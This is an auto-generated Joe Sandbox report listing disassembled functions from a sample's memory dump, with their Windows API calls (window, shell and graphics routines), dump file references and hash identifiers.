                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Variant$ClearString$FreeInit$Alloc
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1906771560-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e733c2cee5cbb5377ac2072c21b29c4e9d8b7a1ab7a7561ec9f277c12a0121fb
                                                                                                                                                                                                                                                                                                • Instruction ID: 04dbbea40edafa167825a5640816ee55d2e105094fff44b6784cacd96e044d36
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e733c2cee5cbb5377ac2072c21b29c4e9d8b7a1ab7a7561ec9f277c12a0121fb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47B136716083409FC310DF69C884A1BFBE9BFC9714F24895EE99887362D774E949CB92
                                                                                                                                                                                                                                                                                                Function 004181A0 Relevance: 10.7, APIs: 7, Instructions: 190windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 004181B6
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,00000006), ref: 00418204
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,000003FD), ref: 0041827F
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,000003FD), ref: 004182FA
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041833E
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00418350
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00000003,0000FFFE), ref: 004183AA
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RectWindow$ClientMessageSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1071774122-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 81f35ccb1619ef2e815f8add3878e72e1f22e65b62a8cf288e8ccd6dbd741210
                                                                                                                                                                                                                                                                                                • Instruction ID: 3d1e85c786be0547c74fbf31f73b40b43d39c9eef0f0cab4dee81a64cc519da0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81f35ccb1619ef2e815f8add3878e72e1f22e65b62a8cf288e8ccd6dbd741210
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9951B2713407026BD215EB60CD9AF6F73AAEBC4B04F04491CF6459B2D0EEB4E901879A
                                                                                                                                                                                                                                                                                                Function 0042EF10 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 159windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0042EF55
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,-00000001,-00000001), ref: 0042EF6C
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,-00000001,-00000001), ref: 0042EF88
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 0042EFF2
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001008,?,00000000), ref: 0042F0A9
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 1b28692c5bafc0e0b03818e8d9035994aace83cec63172a9aced00264d4cecb8
                                                                                                                                                                                                                                                                                                • Instruction ID: 4a8da6b0a3b4820785d32a6e99519bf5ba1baf34d33d3eec9a517c422a0835b5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b28692c5bafc0e0b03818e8d9035994aace83cec63172a9aced00264d4cecb8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C51E2716083109BD720DF25E981B5BB7F4FB88710F800A7EF94997392D775E8058B9A
                                                                                                                                                                                                                                                                                                Function 0042ED50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32 ref: 0042EDC0
                                                                                                                                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 0042EDEF
                                                                                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(0047D9D0,00000000), ref: 0042EE38
                                                                                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(0047D9D0,00000000), ref: 0042EE65
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042EEC4
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Path$LongName$BrowseFolderFromListMessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402075
                                                                                                                                                                                                                                                                                                • API String ID: 3410855119-2194680865
                                                                                                                                                                                                                                                                                                • Opcode ID: e6d7c4e539e09ccdccd185b6b38999d2c4effd13c27e3da9bd57aaf8eb70b9d9
                                                                                                                                                                                                                                                                                                • Instruction ID: 60252550f2a576e17c879c635a3a802f8da064449550e8d1e332f21db53478d5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6d7c4e539e09ccdccd185b6b38999d2c4effd13c27e3da9bd57aaf8eb70b9d9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F416471508301AFD310DF65DDC8EABBBE8FB58351F40092EF55A921E0D7749849CB5A
                                                                                                                                                                                                                                                                                                Function 004293B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 129windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ActiveMessageWindow
                                                                                                                                                                                                                                                                                                • String ID: 3400001$3400101$3401090$rY
                                                                                                                                                                                                                                                                                                • API String ID: 3610105657-3605576623
                                                                                                                                                                                                                                                                                                • Opcode ID: 5932f68488161c627aebd4246385e4a992ea64bdc1114815fce31a9279d2be1f
                                                                                                                                                                                                                                                                                                • Instruction ID: 6a8541e3f689305ec2f6cb5d2be3b4f28d8c1de2ea2bbd417e2b40b4f34285ca
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5932f68488161c627aebd4246385e4a992ea64bdc1114815fce31a9279d2be1f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B44193B1704210ABD710EB65EC45BAB73A8AF94704F40892FF90ED2290DB78ED45C76D
                                                                                                                                                                                                                                                                                                Function 005035CA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00503601
                                                                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00503609
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00503692
                                                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 005036BD
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00503712
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                • Opcode ID: 727bd755396df652e1a708ec171ae51c463fec0952143e88064398cf5f6b08bc
                                                                                                                                                                                                                                                                                                • Instruction ID: 821d69273ac79cc1eb4721babc24db78b3a3adc9ff51cf5d9205813b4df27ecf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 727bd755396df652e1a708ec171ae51c463fec0952143e88064398cf5f6b08bc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2418234A00209AFCF10DF69C885A9EBFA9FF85314F148166E8195B3D2D732DB15CB91
                                                                                                                                                                                                                                                                                                Function 00467490 Relevance: 10.6, APIs: 7, Instructions: 118windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004674EB
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 004674FB
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0046751B
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0046752A
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00467561
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0046758A
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 004675DC
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreateParentRect$BitmapClientWindow
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1335343179-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ae058cf5547a5b73137727556229a9f4d12eeb23d99a6f799289078dd219408d
                                                                                                                                                                                                                                                                                                • Instruction ID: ec974f87df7e9fb3a3618fae45b6badb24d167debaf80877d84b9ed91747ca3a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae058cf5547a5b73137727556229a9f4d12eeb23d99a6f799289078dd219408d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D411AB1508740AFC315DF68C985E5BBBE8FBD8714F008A1EF59A93290DB74E844CB66
                                                                                                                                                                                                                                                                                                Function 00423480 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(00000010,00000002), ref: 0042352E
                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(1088D068), ref: 00423545
                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0042354F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
